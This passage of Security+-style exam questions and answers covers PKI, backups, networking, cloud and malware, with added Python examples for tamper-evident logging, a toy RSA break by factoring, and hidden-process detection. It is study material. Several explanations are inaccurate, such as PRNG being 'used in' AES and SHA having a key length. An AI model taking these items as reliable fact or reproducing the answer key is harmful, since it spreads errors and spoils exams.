symmetrical PRNG Advanced Encryption Standard (AES), Data Encryption Standard (DES), and Blowfish are examples of symmetrical algorithms and pseudo-random number generation (PRNG). Symmetric algorithms are sometimes called block ciphers. Random number generation and pseudo-random number generation are types of algorithms used to generate cryptographic keys. PRNG uses a symmetric algorithm to generate a number that is "random enough" for cryptographic purposes. PRNG is used in AES, DES, and Blowfish. Random number generation is used in asymmetric ciphers, such as RSA, Diffie-Hellman, and Elliptic Curve Cryptosystem (ECC). For the Security+ exam, you will also need to understand collision, obfuscation, and key strength. Diffusion is the cryptographic technique whereby a change of a single input bit results in a change of multiple output bits. A collision is the result of a hashing algorithm producing the same output from two different inputs. Obfuscation is the basic foundation of both encryption and steganography. The term means to hide something so that it is not easily readable. Key strength should reflect the sensitivity of the data it protects. Generally, as the need to secure the data increases, so should the strength of the key. Longer keys require more processing power (and time) to break.

What is meant by MTBF?

the average amount of time from one failure to the next The mean time between failures (MTBF) is the average amount of time from one failure to the next. The MTBF is usually supplied by the hardware vendor or a third party. The mean time to repair (MTTR) is the amount of time that it will take to repair a piece of equipment when failure occurs.

Management has asked you to ensure that the certificates that have been validated in the corporate PKI are protected. What must be secured in the PKI?

the private key of the root CA The private key of the root certification authority (CA) must be secured to ensure that the certificates that have been validated in a public key infrastructure (PKI) are protected. If the private key of the root CA has been compromised, then a new root certificate must be created and the PKI must be rebuilt. Answers B, C, and D are incorrect. The public key is found in the trusted root CA. If the private key of a user's certificate has been compromised, then a new certificate should be created for that user and the user's compromised certificate should be revoked. The compromise of a user's certificate will not jeopardize other certificates in a PKI. A public key, as its name implies, is public, and does not need to be kept secret. If the private key of a server has been compromised by an intruder, you should submit the public key to the CRL.

You have recently implemented a new public key infrastructure (PKI) for your organization. You need to back up the entity that is responsible for certifying the public key pair of the root CA. Which entity must you back up?

the root CA You should back up the root CA. The root certification authority (CA) must certify its own public key pair. An organization may also want to have a root CA's public key pair certified by an external CA for added security and confidence in the key pair. Neither a subordinate CA nor a Kerberos server is used to certify a root CA's key pair. A subordinate or intermediate CA issues certificates under a certificate that was itself issued by a root authority or by another higher-level intermediate authority. Organizations frequently take the root CA offline for security reasons and allow the intermediate CA to actually issue certificates.

Your company has recently implemented a content inspection application on a perimeter firewall. What is the purpose of content inspection?

to search for malicious code or behavior The purpose of content inspection is to search for malicious code or suspicious behavior. Answer A is incorrect. The purpose of load balancing is to distribute the workload across multiple devices. Often DNS servers are load balanced to ensure that DNS clients can obtain DNS information as needed. Other services are load balanced as well. Load balancers optimize and distribute data workloads across multiple computers or networks. Answer D is incorrect. The purpose of an Internet or Web proxy is to filter and forward Web content anonymously. Answer C is incorrect. The purpose of a spam filter is to identify and block unwanted messages. Spam filters should be configured to prevent employees from receiving unsolicited e-mail messages. Another type of hardware that is similar to a spam filter is an all-in-one security appliance. This device filters all types of malicious, wasteful, or otherwise unwanted traffic. Many all-in-one security appliances include a component that performs content inspection and malware inspection. These appliances usually also include a URL filter feature that allows administrators to block and allow certain Web sites. For example, the URL filter in an all-in-one security appliance could be configured to restrict access to peer-to-peer file sharing Web sites.

Your company has a backup solution that performs a full backup each Saturday evening and an incremental backup all other evenings. A vital system crashes on Monday morning. How many backups will need to be restored?

two Because the system crashes on Monday morning, you will need to restore two backups: the full backup from Saturday evening and the incremental backup from Sunday evening. When incremental backups are included in your backup plan, you will need to restore the full backup and all incremental backups that have been taken since the full backup. Because the failure occurred on Monday morning, only the full Saturday backup and the incremental Sunday backup need to be restored. If the crash had occurred on Tuesday morning, you would have needed to restore three backups: Saturday evening's full backup, Sunday evening's incremental backup, and Monday evening's incremental backup. If the crash had occurred on Wednesday morning, you would have needed to restore four backups: Saturday evening's full backup, Sunday evening's incremental backup, Monday evening's incremental backup, and Tuesday evening's incremental backup.

You have implemented the three databases that your organization uses to ensure that an entire transaction must be executed to ensure data integrity. If a portion of a transaction cannot complete, the entire transaction is not performed. Which database security mechanism are you using?

two-phase commit You are using the two-phase commit. A two-phase commit ensures that the entire transaction is executed to ensure data integrity. If a portion of a transaction cannot complete, the entire transaction is not performed. Answer C is incorrect. Concurrency ensures that the most up-to-date information is shown to database users. To ensure concurrency, locks are often implemented at the page, table, row, or field level to ensure updates happen one at a time. Answer B is incorrect. Savepoints ensure that the database can return to a previous state if a system failure occurs. A savepoint will usually save part of the data update. Savepoints are a security mechanism to ensure data integrity. Answer A is incorrect. Aggregation occurs when a user takes information from different sources and combines it to accurately infer information that the user does not have the clearance to view directly.

What is an example of a brute force attack?

using a program to guess passwords from a SAM file Using a program to guess passwords from a Security Account Manager (SAM) file is an example of a brute force attack. A SAM file, which is used on some Windows networks, contains encrypted passwords. A hacker can initiate a brute force attack in an attempt to decrypt passwords stored in a SAM file. You can defend against a brute force network attack by increasing the complexity and keyspace requirements of the password. Answer D is incorrect. Sending multiple Internet Control Message Protocol (ICMP) messages to a Web server is a type of denial of service (DoS) attack that is referred to as a ping of death. Answer C is incorrect. Searching through a company's trash to find sensitive information is a type of physical attack that is sometimes referred to as dumpster diving. Answer B is incorrect. Using a packet analyzer to gather packets from a network connection between two computers is a method that can be used to initiate a man in the middle (MITM) attack.

Which types of computers are targeted by RedPill and Scooby Doo attacks?

virtual machines RedPill and Scooby Doo attacks target virtual machines. These attacks attempt to detect virtual servers and machines on a network. Once the virtual machines are identified, various techniques are used to attack the virtual machines to breach the host and eventually the network. Answers B, C, and D are incorrect. RedPill and Scooby Doo attacks do not target Windows Server 2008 computers, Windows Vista clients, or terminal servers, unless these computers exist as virtual servers or virtual machines. Virtual machines are usually implemented within an organization so that the organization can internally manage them. Cloud computing differs from virtual computing in that cloud computing is usually physically managed by an outside entity. An organization pays the cloud computing organization for rights to use portions of the organization's cloud. However, the organization that is leasing the cloud is never really in physical control of the data.

Your company has decided to implement a biometric system to ensure that only authorized personnel are able to access several secure areas at the facility. However, management is concerned that users will have privacy concerns when the biometric system is implemented. You have been asked to recommend the least intrusive biometric system of the listed options. Which option is considered the least intrusive?

voice print A voice print is considered less intrusive than the other options given. A voice recognition scanner is used to capture a voice print. Retinal scanners and iris scanners are used to scan the retina and iris, respectively. Both an iris scan and a retinal scan are considered more intrusive because of the way in which the scan is completed. Most people are reluctant to have a scanner read any eye geometrics. A fingerprint scanner is used to scan a fingerprint. A fingerprint scan is more intrusive than a voice print. Most people are reluctant to give their fingerprints because fingerprints can be used by law enforcement. A voice print is very easy to obtain. Its primary purpose is to distinguish a person's manner of speaking and voice patterns. Voice print systems are easy to implement compared to some other biometric methods. Voice prints are usually reliable and flexible. A facial recognition scanner is used to scan facial characteristics. A facial scan is based on an individual's bone structure, nose ridge, eye width, forehead structure, and chin shape.

Recently, several confidential messages from your company have been intercepted. Your company has decided to implement PGP to encrypt files. Which type of model does this encryption use?

web Pretty Good Privacy (PGP) uses a web of trust to validate public key pairs. In a web of trust model, users sign their own key pairs. If a user wants to receive a file encrypted with PGP, the user must first supply the public key. In a public key infrastructure (PKI), certification authorities (CAs) are arranged in a hierarchy and sign public key pairs. Many older Ethernet networks used a bus model for their physical architecture. In a bus network, all computers on a network are connected to a central bus cable. A ring model is used to wire computers in token ring networks. In a ring network, all computers are connected to a physical ring of cable. GNU Privacy Guard (GPG) is an alternative to the PGP suite of cryptographic software. It uses a combination of conventional symmetric-key cryptography for speed, and public-key cryptography for ease of secure key exchange. GPG currently supports the following algorithms:
Pubkey: RSA, ElGamal, DSA
Cipher: IDEA (from 1.4.13/2.0.20), 3DES, CAST5, Blowfish, AES-128, AES-192, AES-256, Twofish, Camellia-128, Camellia-192, Camellia-256 (from 1.4.10/2.0.12)
Hash: MD5, SHA-1, RIPEMD-160, SHA-256, SHA-384, SHA-512, SHA-224

You instruct a user to issue the ipconfig command with the /release and /renew options. In which two situations would it be appropriate to ask a user to do this?

when recent scope changes have been made on the DHCP server when the result of running the ipconfig /all command indicates a 169.254.163.6 address It would be appropriate to issue the ipconfig command with the /release and /renew options in the following situations:
When the result of running the ipconfig /all command indicates a 169.254.163.6 address
When recent scope changes have been made on the DHCP server
When a computer has an address in the 169.254.0.0 network, it indicates that the computer has not been issued an address from the DHCP server. Instead, the computer has utilized Automatic Private IP Addressing (APIPA) to issue itself an address. If the reason for this assignment is a temporary problem with the DHCP server or some other transitory network problem, issuing the ipconfig /release command followed by the ipconfig /renew command could allow the computer to receive the address from the DHCP server. Similarly, if changes have been made to the settings on the DHCP server, such as a change in the scope options (such as gateway or DNS server), issuing this pair of commands would update the DHCP client with the new settings when this address is renewed. These commands will have no effect if no IP helper address has been configured on the router between the client and the DHCP server. An IP helper address can be configured on the local interface of a router when no DHCP server exists on that subnet and you would like to allow the router to forward DHCP DISCOVER packets to the DHCP server on a remote subnet. DHCP DISCOVER packets are broadcast, and routers do not pass on broadcast traffic by default. These commands will also have no effect if the no ip directed-broadcast command has been issued on the router interface that is local to the client, and an IP helper address has not been configured on the router between the client and the DHCP server. The no ip directed-broadcast command instructs the router to deny broadcast traffic, which is the default behavior. Under those conditions, the command will not result in finding the DHCP server or receiving an address.

Your network uses the subnet mask 255.255.255.224. Which of the following IPv4 addresses are able to communicate with each other? (Select the two best answers.)

10.36.36.166 10.36.36.184 The hosts using the IP addresses 10.36.36.166 and 10.36.36.184 would be able to communicate with each other because they are on the same subnet (known as subnet ID 5). All of the other answer choices' IP addresses are on different subnets, so they would not be able to communicate with each other (or with the IP addresses of the correct answers) by default. Table 6-6 provides the complete list of subnets and their ranges for this particular subnetted network. It is noteworthy that the answer 10.36.36.224 is not even usable because it is the first IP of one of the subnets. Remember that the general rule is: you can't use the first and last IP within each subnet. That is because they are reserved for the subnet ID and the broadcast addresses, respectively.

Which of the following authentication protocols makes use of a supplicant, authenticator, and authentication server?

802.1X 802.1X makes use of three components: a supplicant, which is software running on a workstation; an authenticator, which is a wireless access point or switch; and an authentication server, which is an authentication database, most likely a RADIUS server. Kerberos makes use of a key distribution center that works with tickets to prove the identity of users. RADIUS provides centralized administration of dial-up, VPN, and wireless authentication and can be used with 802.1X and EAP (Extensible Authentication Protocol). LDAP (Lightweight Directory Access Protocol) can access and modify directory services data.

DMZ

A special area of the network (sometimes referred to as a subnetwork) that houses servers that host information accessed by clients or other networks on the Internet.

You have been tasked to implement an encryption algorithm that has a key length of 128 bits. Which of the following is the only solution?

AES AES-128 is a 128-bit cipher, meaning it has a key length of 128 bits. However, a more secure solution would be to use AES-256 (256-bit key length). SHA-1 is 160-bit, and SHA-2 is 256- or 512-bit in key length. DES is 56-bit, and its successor 3DES is 168-bit.

You have collected login information, file access information, security log files, and unauthorized security violations. What is this collection known as?

Audit trail An audit trail is a collection of security log files, unauthorized security violations, and other logged information such as successful or failed logins. The audit is the technical assessment made of applications, files, and networks; quite often this includes an audit trail. An access control list (ACL) is a set of rules or permissions. The security log is the log file in Windows (found in the Event Viewer) that shows security violations or allowed access whether they succeeded or not; it works when auditing has been turned on.

What two security precautions can best help to protect against wireless network attacks?

Authentication and WPA The best two security precautions are authentication and WPA. Although WPA2 is more secure than WPA, the term "identification" is not correct. WEP is a deprecated wireless encryption protocol and should be avoided.

Which of the following protocols or services uses port 19?

CHARGEN CHARGEN, the character generator, uses port 19. It is commonly used by a Fraggle attack. Echo uses port 7. Telnet uses port 23. SMTP uses port 25.

You are required to renew an SSL certificate for a web server. Which of the following should you submit to the certificate authority?

CSR A CSR (certificate signing request) is used when a new, or renewed, certificate is required for a web server. It is submitted to the company that sells the SSL certificates (such as VeriSign). A private key is first generated (usually an RSA key), which the CSR is based on, but that key should be kept private. Only the admin should know the key. A CRL (certificate revocation list) contains certificates that have expired or have been revoked because they were compromised. RA can stand for either registration authority, which works in conjunction with the CA, or recovery agent, which is needed to recover keys that have been lost.

A recent security audit has uncovered an increase in the number of MITM attacks during the certificate validation process. Which of the following is a way to add security to the certificate validation process to help detect and block many types of MITM attacks by adding an extra step beyond normal X.509 certificate validation?

Certificate pinning One way to add security to the certificate validation process is to use certificate pinning (also known as SSL pinning or public key pinning). This can help to detect and block many types of MITM (man-in-the-middle) attacks by adding an extra step beyond normal X.509 certificate validation. OID (object identifier) stapling is invalid here. However, OCSP (Online Certificate Status Protocol) stapling allows the presenter of the certificate to bear the cost involved when providing OCSP responses, and OIDs are built into Active Directory Certificate Services (AD CS) for either low, medium, or high assurance. Secure Shell (SSH) is a protocol that can create a secure channel between two computers or network devices, enabling one computer or device to remotely control the other. Secure/Multipurpose Internet Mail Extensions (S/MIME) is an IETF standard that provides cryptographic security for electronic messaging such as e-mail. It is used for authentication, message integrity, and non-repudiation of origin.

Which of the following would you set up in a multifunction SOHO router?

DMZ A DMZ, or demilitarized zone, can be set up on a SOHO router (in the firewall portion) to create a sort of safe haven for servers. It is neither the LAN nor the Internet, but instead, a location in between the two.

A security analyst wants to ensure that all external traffic is able to access an organization's front-end servers but also wants to protect access to internal resources. Which network design element is the best option for the security analyst?

DMZ The demilitarized zone (DMZ) is the best option in this scenario. By creating a DMZ, and placing the front-end servers within it (on a separate branch of the firewall), you create a type of compartmentalization between the LAN (important internal resources) and the front-end servers. A VLAN is used to separate a LAN into multiple virtual units. Virtualization is a general term that usually refers to the virtualizing of operating systems. Cloud computing is another possible option in this scenario, because you could take the front-end servers and move them to the cloud. However, a certain level of control is lost when this is done, whereas with a DMZ, the security analyst still retains complete control.

Your boss asks you to replace the current RADIUS authentication system with a more secure system. Your current RADIUS solution supports EAP, and your new solution should do the same. Which of the following is the best option and would offer the easiest transition?

Diameter The Diameter protocol is, like RADIUS, another AAA protocol, but is a more evolved protocol and utilizes more reliable transport mechanisms such as TCP and Stream Control Transmission Protocol (SCTP), as opposed to UDP. Like RADIUS, many Diameter applications allow for the use of the Extensible Authentication Protocol (EAP). CHAP (Challenge-Handshake Authentication Protocol) is an authentication scheme used to authenticate a user or host. Whereas RADIUS and Diameter are authentication systems, they both make use of authentication schemes such as PAP, CHAP, and EAP. SAML (Security Assertion Markup Language) is an XML-based open standard for exchanging authentication and authorization data between two parties. It helps alleviate problems with single sign-on (SSO). Kerberos is another type of authentication system, but is used more commonly in localized environments; it is not meant as a replacement for RADIUS.

What would you use a TPM for?

Full disc encryption A TPM (trusted platform module) is a chip that resides on a motherboard (or similar location) that stores encrypted keys used to encrypt the entire hard disk on the system. Input validation is a technique used by programmers to secure their forms. System hardening is the process of securing a computer system through updates, closing ports, and so on. Cloud computing is the use of web-based applications (and other software, platforms, and infrastructures) that are provided by an external source on the Internet.

Randy needs an external add-on solution that can provide encryption and integrate with his existing database server. Which of the following would meet his needs?

HSM An HSM (hardware security module) provides encryption and can be an external device that can integrate with an existing server. A TPM (trusted platform module) is an encrypting chip that resides on a motherboard. FDE stands for full disk encryption, which can be implemented with a TPM. CAC stands for Common Access Card, a smart ID card used by the Department of Defense (DoD).

Which of the following attacks involves the interception of authentication traffic on a wireless network?

IV Attack The IV (initialization vector) attack is when an attacker deciphers the fixed-size input at the beginning of each WEP or WPA packet. WEP is much more susceptible. To avoid the attack, use WPA2. An evil twin is a rogue access point that is controlled by an attacker. It has the same name and configuration as one of the legitimate WAPs in an organization. A replay attack is a network attack in which data packets are repeated or delayed by an outside attacker. Near field communication (NFC) is a technology of mobile devices that allows them to automatically pair and transmit data via Bluetooth.

Your boss (the IT director) wants to move several internally developed software applications to an alternate environment, supported by a third party, in an effort to reduce the footprint of the server room. Which of the following is the IT director proposing?

IaaS The IT director is most likely proposing that you use infrastructure as a service (IaaS). A cloud-based service, IaaS is often used to house servers (within virtual machines) that store developed applications. It differs from PaaS in that it is the servers, and already developed applications, that are being moved from the server room to the cloud. However, PaaS might also be required if the applications require further development. The most basic cloud-based service, software as a service (SaaS), is when users work with applications (often web-based) that are provided from the cloud. A community cloud is when multiple organizations share certain aspects of a public cloud.

Which of the following concepts best describes the mandatory access control model?

Lattice Mandatory access control (MAC) has two common implementations: rule-based access control and lattice-based access control. Lattice-based access control is used for more complex determinations of object access by subjects; this is done with advanced mathematics that creates sets of objects and subjects and defines how the two interact. Bell-LaPadula is a state machine model used for enforcing access control in government applications. It is a less-common, multilevel security derivative of mandatory access control. This model focuses on data confidentiality and controlled access to classified information. The Biba Integrity Model describes rules for the protection of data integrity. Clark-Wilson is another integrity model that provides a foundation for specifying and analyzing an integrity policy for a computing system.

You receive complaints about network connectivity being disrupted. You suspect that a user connected both ends of a network cable to two different ports on a switch. What can be done to prevent this?

Loop protection Loop protection should be enabled on the switch to prevent the looping that can occur when a person connects both ends of a network cable to the same switch. A DMZ is a demilitarized zone that is used to keep servers in a midway zone between the Internet and the LAN. VLAN segregation (or VLAN separation) is a way of preventing ARP poisoning. Port forwarding refers to logical ports associated with protocols.

Which wireless configurations can be easily circumvented using a network sniffer?

MAC filtering Disabled SSID Utilizing a network sniffer (or packet analyzer) can aid an attacker in discerning the SSID of an AP as well as which MAC addresses are being allowed in. By drilling down through the frames of information that are captured, the attacker can easily find the SSID name and, with a little work, can deduce the MAC addresses that have access to the network. Then the person need only spoof the MAC address and connect to the AP's SSID manually to have access to the wireless network. The other answers concern authentication and encryption methods, which will be much more difficult to circumvent. 802.1X is network access control that uses various types of authentication methods including EAP-TLS. WEP and WPA2 are encryption methods, and although WEP is deprecated, it is difficult to get past when used in conjunction with 802.1X.

Which of the following requires a CA during the authentication process?

PEAP-TLS PEAP (Protected Extensible Authentication Protocol) creates a TLS (Transport Layer Security) tunnel by acquiring a PKI certificate from a CA. It is known simply as PEAP or as PEAP-TLS. It is similar to EAP-TTLS. FTPS is FTP over SSL. Explicit mode means that the FTPS client must explicitly request security from the FTPS server. Implicit FTPS connections do not allow negotiation—there is no request for security; it is expected from the server. MD5 is a cryptographic hash function.

Which of the following cloud computing services offers easy-to-configure operating systems?

PaaS Platform as a service (PaaS) is a cloud computing service that offers many software solutions, including easy-to-configure operating systems and on-demand computing. SaaS is software as a service, used to offer solutions such as webmail. IaaS is infrastructure as a service, used for networking and storage. VM stands for virtual machine, which is something that PaaS also offers.

You are logging a server. What security measures should you implement?

Perform hashing of the log files Apply retention policies on the log files You need to retain log files for future analysis. Log files are normally not deleted, but operating systems will overwrite the oldest events once a log reaches its maximum size, so log size, rotation, and forwarding to a separate collector deserve careful configuration. Hashing the log files lets people verify their integrity in the future and confirm that the files have not been tampered with. For that to mean anything, the hashes (or better, a keyed HMAC or signature over them) must be stored where an attacker who edits the log cannot also recompute them; a hash kept beside the log on the same host proves little. A cyclic redundancy check (CRC) is an error-detecting code that disks and network links compute automatically to catch accidental corruption; it isn't something an administrator performs per se, and because anyone can recompute it, it offers no protection against deliberate modification. CRCs and collecting temporary files are not relevant to securing log files.
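Hashing each file once only proves the file is unchanged since the hash was taken; it says nothing about a single line that was edited or deleted in between. The following added example (not from the book or the page) chains a keyed HMAC through every log line so that an edit, a deletion, a reordering or a truncation of the tail is detected, and it reports where the chain first breaks. The log lines and the key are constructed for the example; in practice the key and the final "head" value are kept off the logging host, for instance on the collector the logs are forwarded to.

```python
import hashlib
import hmac

GENESIS = b"\x00" * 32  # starting "previous tag" for an empty log


def chain_log(lines, key, prev=GENESIS):
    """Tag every line with HMAC(key, previous_tag || line).

    Returns the (line, tag) entries and the final tag, the head, which must be
    stored somewhere the writer of the log cannot reach.
    """
    entries = []
    for line in lines:
        tag = hmac.new(key, prev + line.encode("utf-8"), hashlib.sha256).digest()
        entries.append((line, tag.hex()))
        prev = tag
    return entries, prev.hex()


def verify_chain(entries, key, head, prev=GENESIS):
    """Return (True, None) if intact, else (False, index_of_first_bad_entry).

    An index equal to len(entries) means every present entry checks out but the
    tail is missing (or the stored head is wrong).
    """
    for idx, (line, tag_hex) in enumerate(entries):
        expected = hmac.new(key, prev + line.encode("utf-8"), hashlib.sha256).digest()
        if not hmac.compare_digest(expected.hex(), tag_hex):
            return False, idx
        prev = expected
    if not hmac.compare_digest(prev.hex(), head):
        return False, len(entries)
    return True, None


# Constructed sample log and key (not real events, not a real secret).
KEY = b"example-key-kept-on-the-collector"
SAMPLE_LINES = [
    "2024-03-10T10:00:01Z sshd[412]: Accepted publickey for alice from 10.0.0.5",
    "2024-03-10T10:00:07Z sudo: alice : TTY=pts/0 ; COMMAND=/usr/bin/systemctl restart nginx",
    "2024-03-10T10:01:15Z sshd[440]: Failed password for root from 203.0.113.9",
    "2024-03-10T10:01:16Z sshd[440]: Failed password for root from 203.0.113.9",
]


def tamper_demo():
    """Show what each kind of tampering looks like to the verifier."""
    entries, head = chain_log(SAMPLE_LINES, KEY)
    edited = list(entries)
    edited[1] = (edited[1][0].replace("alice", "bob"), edited[1][1])  # rewrite who ran sudo
    deleted = entries[:2] + entries[3:]                                # drop one failed login
    truncated = entries[:-1]                                            # chop the tail
    return {
        "intact": verify_chain(entries, KEY, head),
        "edited": verify_chain(edited, KEY, head),
        "deleted": verify_chain(deleted, KEY, head),
        "truncated": verify_chain(truncated, KEY, head),
    }


if __name__ == "__main__":
    for name, result in tamper_demo().items():
        print(f"{name:10s} -> {result}")
```

Because each tag covers the previous tag, an attacker who alters line k must recompute every tag from k onward, which requires the key; and even with the key, the stored head no longer matches. Retention policy is the other half of the answer: the chain is only useful if the entries it covers are still there when someone needs to check them.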

Users are required to log in to the network. They use a smart card to do so. Which type of key does the smart card use to log in to the network?

Private key A private key is used by smart cards during login to a network: the key never leaves the card, the card signs a challenge with it, and the domain validates the signature with the public key in the user's certificate. Often the smart card is used along with another form of authentication (typically a PIN), creating a multifactor scheme. A public key is the openly distributed half of an asymmetric pair; it verifies what the private key signed and encrypts what only the private key can decrypt. A key is basically one component of a cipher or algorithm. A shared key (also called a secret key) belongs to symmetric encryption, where both parties hold the same key; it is not part of a public-key environment.

Your organization uses VoIP. Which of the following should be performed to increase the availability of IP telephony by prioritizing traffic?

QoS Quality of Service (QoS) should be configured on the router to prioritize traffic, promoting IP telephony traffic to be more available. You'll get some detractors of QoS, especially for the SOHO side of networks, but if used on the right device and configured properly, it can make a difference. This might sound like more of a networking question, but it ties in directly to the CIA triad of security. Data confidentiality and integrity are important, but just as important is availability—the ability for users to access data when required. NAT is network address translation, which interprets internal and external IP networks to each other. NAC is network access control—for example, 802.1X. Subnetting is when a network is divided into multiple logical areas through IP addressing/planning and subnet mask configuring.

Which of the following algorithms depends on the inability to factor large prime numbers?

RSA RSA (Rivest, Shamir, and Adleman) is a public-key cryptography algorithm whose security rests on the difficulty of factoring a large number that is the product of two large primes (the primes themselves are not what gets factored). It is used in many e-commerce scenarios. AES (Advanced Encryption Standard) is a symmetric cipher built on a substitution-permutation network. Elliptic curve cryptography rests on the elliptic curve discrete logarithm problem: recovering the secret scalar from a point that has been multiplied on the curve. Diffie-Hellman rests on the discrete logarithm problem in a finite field; it lets two parties agree on a shared secret over an insecure channel without having exchanged any secret beforehand.

When creating a public/private key pair, which of the following would an admin need to specify key strength?

RSA RSA is the only cipher listed that deals with private and public keys; it is an asymmetric algorithm. When generating the key pair for a certificate, the admin specifies the underlying algorithm (most likely RSA) and its key strength, meaning the modulus length (2048-bit or higher today; public CAs have not issued certificates for 1024-bit keys since 2014 because such moduli are within reach of well-resourced attackers). AES and DES are symmetric algorithms with no public/private pair; an admin can pick AES-128, AES-192 or AES-256, but that selects a fixed variant rather than sizing a key pair, and DES is fixed at 56 bits. SHA is a cryptographic hash function and has no key at all.

Which one of the following is the most common encryption protocol used for key exchange during a secure web session?

RSA In TLS 1.2 and earlier, RSA was the most common key exchange method for secure web sessions: the client encrypts the premaster secret with the server's RSA public key, so anyone who later obtains the server's private key (or factors its modulus) can decrypt every recorded session. The alternatives are Diffie-Hellman and elliptic-curve Diffie-Hellman, with or without ephemeral keys; the ephemeral variants (DHE and ECDHE) provide forward secrecy, and TLS 1.3 allows only those, using RSA purely for signatures. After the key exchange, the Advanced Encryption Standard (AES) encrypts the session data. It is a symmetric algorithm that is also used for local data encryption and securing wireless connections. The Secure Hash Algorithm (SHA) is a cryptographic hash function; in a secure web session it underpins the HMAC or AEAD integrity protection, the key derivation and the certificate signatures. PKI stands for public key infrastructure, the entire set of rules, policies, systems, and users that issue and validate the certificates on which protocols such as TLS and SSL depend.
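The three RSA questions above turn on one fact: the private exponent is only secret while the modulus is hard to factor, which is why key strength is chosen at key-pair creation and why a recorded RSA key-transport session falls to whoever can later factor or steal the key. This added example (not from the book or the page) builds a deliberately tiny RSA key pair, performs an RSA-style key transport, and shows a passive attacker recovering the session key by factoring; it then runs an ephemeral Diffie-Hellman exchange whose per-session secrets are discarded, which is the property that gives DHE forward secrecy. The key sizes, the Mersenne prime used as the DH group and all values are toy choices for illustration only.

```python
import math
import random
import secrets


def is_probable_prime(n, rounds=20):
    """Miller-Rabin; good enough for generating toy keys."""
    if n < 2:
        return False
    for p in (2, 3, 5, 7, 11, 13, 17, 19, 23, 29):
        if n % p == 0:
            return n == p
    d, r = n - 1, 0
    while d % 2 == 0:
        d //= 2
        r += 1
    for _ in range(rounds):
        x = pow(random.randrange(2, n - 1), d, n)
        if x in (1, n - 1):
            continue
        for _ in range(r - 1):
            x = pow(x, 2, n)
            if x == n - 1:
                break
        else:
            return False
    return True


def random_prime(bits):
    while True:
        cand = secrets.randbits(bits) | (1 << (bits - 1)) | 1  # force top bit and oddness
        if is_probable_prime(cand):
            return cand


def rsa_keygen(bits):
    """Return ((n, e), (n, d)); d stays secret only as long as n resists factoring."""
    e = 65537
    while True:
        p, q = random_prime(bits // 2), random_prime(bits // 2)
        phi = (p - 1) * (q - 1)
        if p != q and math.gcd(e, phi) == 1:
            break
    return (p * q, e), (p * q, pow(e, -1, phi))


def rsa_encrypt(pub, m):
    n, e = pub
    return pow(m, e, n)


def rsa_decrypt(priv, c):
    n, d = priv
    return pow(c, d, n)


def trial_factor(n):
    """Trial division: instant for a toy modulus, hopeless for a 2048-bit one."""
    f = 3
    while f * f <= n:
        if n % f == 0:
            return f, n // f
        f += 2
    return None


def break_rsa_key_transport(pub, c):
    """Passive attacker: recorded ciphertext plus a factored modulus yields the session key."""
    n, e = pub
    p, q = trial_factor(n)
    return pow(c, pow(e, -1, (p - 1) * (q - 1)), n)


# Toy DH group: 2**127 - 1 is prime. Real deployments use vetted groups (e.g. RFC 7919).
DH_P, DH_G = 2 ** 127 - 1, 3


def dh_ephemeral_exchange():
    """Fresh secrets a, b exist only for this session; returns (client's, server's) shared value."""
    a, b = secrets.randbelow(DH_P - 2) + 1, secrets.randbelow(DH_P - 2) + 1
    A, B = pow(DH_G, a, DH_P), pow(DH_G, b, DH_P)  # the only values an eavesdropper sees
    return pow(B, a, DH_P), pow(A, b, DH_P)


def demo(bits=40):
    pub, priv = rsa_keygen(bits)
    session_key = secrets.randbits(32)        # what the client would send under RSA key transport
    c = rsa_encrypt(pub, session_key)
    s_client, s_server = dh_ephemeral_exchange()
    return {
        "modulus_bits": pub[0].bit_length(),
        "server_decrypts": rsa_decrypt(priv, c) == session_key,
        "attacker_recovers_key": break_rsa_key_transport(pub, c) == session_key,
        "dh_both_sides_agree": s_client == s_server,
    }


if __name__ == "__main__":
    print(demo())
```

With a 2048-bit modulus the `trial_factor` step is the part that does not finish; everything else in the attack is the same, which is why key strength is the admin's decision and why modern TLS keeps RSA for signatures and moves the key exchange to ephemeral (EC)DH.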

A security incident just occurred involving a physical asset (a USB flash drive). Immediately afterward, what should be done first?

Record every person who was in possession of the asset during and after the incident The first thing you want to know is who was in possession of the USB flash drive. This will be important for your chain of custody, in case the asset is used as evidence in a trial. After the incident, continue logging who takes possession of the drive and when. Documentation is important, and recording each person who was in possession of the drive is a form of documentation; other documentation, such as mitigation methods, is not important right away, and mitigation might not even have been implemented yet. You don't want to "back up" the device by mounting it and copying files off, because a normal mount can write to the drive (access timestamps, filesystem journal updates); instead, image it bit for bit through a write blocker for data preservation and record the hash of the image. That is done after you document who had possession of the drive.

You are the security administrator for your organization and have just completed a routine server audit. You did not notice any abnormal activity. However, another network security analyst finds connections to unauthorized ports from outside the organization's network. Using security tools, the analyst finds hidden processes that are running on the server. Which of the following has most likely been installed on the server?

Rootkit Most likely, a rootkit was installed. These can evade many routine scans, so there is no fault here. It's just that more in-depth analysis was required to find the rootkit. The hidden processes are the main indicator of the rootkit. Spam is simply harassment by e-mail (and other messaging systems), to put it nicely. A logic bomb is code that defines when a particular type of malware will execute. Ransomware is when a computer is operationally held hostage; files are not retrievable by the user (because they have been encrypted) until a ransom is paid. It's important to run in-depth scans periodically. They can be time consuming, but they can uncover many threats and vulnerabilities that would otherwise go unnoticed.
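The analyst in the question found the rootkit through "hidden processes", which in practice means comparing two views of the same system that a rootkit has to falsify consistently. This added example (not from the book or the page, and only one of several cross-view checks tools such as unhide perform) compares what a directory listing of /proc shows against what the kernel admits to when every PID is probed directly with kill(pid, 0). The Linux-specific caveats, threads answering kill() and processes that start or exit mid-scan, are handled in the code; the 65536 PID cap in `scan()` is an arbitrary choice for run time.

```python
import os

PROC = "/proc"


def listed_pids(proc=PROC):
    """View 1: what ps and top see, a readdir() of /proc."""
    return {int(d) for d in os.listdir(proc) if d.isdigit()}


def probed_pids(max_pid):
    """View 2: ask the kernel about each PID directly.

    kill(pid, 0) sends no signal. ESRCH means no such process; EPERM means the
    process exists but belongs to another user, so it still counts as alive.
    """
    alive = set()
    for pid in range(1, max_pid + 1):
        try:
            os.kill(pid, 0)
        except ProcessLookupError:
            continue
        except PermissionError:
            pass
        alive.add(pid)
    return alive


def is_thread(pid, proc=PROC):
    """Linux lets kill() address thread IDs, which never appear in readdir(/proc).

    A TID still has a readable status file, with a Tgid different from the TID.
    A genuinely hidden process has no readable /proc entry at all.
    """
    try:
        with open(f"{proc}/{pid}/status") as fh:
            for line in fh:
                if line.startswith("Tgid:"):
                    return int(line.split()[1]) != pid
    except OSError:
        return False
    return False


def hidden_pids(listed_before, probed, listed_after, thread_check=is_thread):
    """Cross-view diff.

    A PID that answers kill() but is absent from listings taken both before and
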